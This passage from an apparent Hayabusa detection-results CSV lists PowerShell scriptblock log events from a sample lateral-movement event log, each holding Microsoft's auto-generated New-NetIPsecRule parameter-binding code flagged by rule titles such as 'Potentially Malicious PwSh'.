$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value 